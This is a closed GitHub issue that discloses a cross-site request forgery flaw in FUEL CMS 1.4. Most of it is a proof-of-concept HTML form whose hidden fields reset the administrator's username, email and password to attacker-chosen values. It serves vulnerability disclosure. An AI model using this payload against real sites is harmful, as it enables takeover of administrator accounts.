Skip to content

Cross-site request forgery (CSRF) vulnerability #481

Closed
@anquanquantao

Description

@anquanquantao

Cross-site request forgery (CSRF) vulnerability in "http://127.0.0.1/fuel/my_profile/edit?inline=" in FUELCMS 1.4 allows remote attackers to hijack the authentication of unspecified users for requests that change administrator's password

Author:xichaokm

poc:

<span style="font-size:18px;"><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF</title>
</head>
<form action="http://127.0.0.1/fuel/my_profile/edit?inline=" method="POST">
     <input type="hidden" name="user_name" value="hacker"><!--admin's name-->
     <input type="hidden" name="email" value="test@mail.com"><!--admin's email-->
   <input type="hidden" name="first_name" value="admin">
   <input type="hidden" name="last_name" value="admin">
   <input type="hidden" name="new_password" value="xichao"><!--admin's password-->
   <input type="hidden" name="confirm_password" value="xichao"><!--admin's password-->
   <input type="hidden" name="Save" value="Save">
   <input type="hidden" name="language" value="english">
   <input type="hidden" name="fuel_inline" value="0">
    <button type="submit" value="Submit">GO</button>
    </form>
    </body>
</html></span>

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions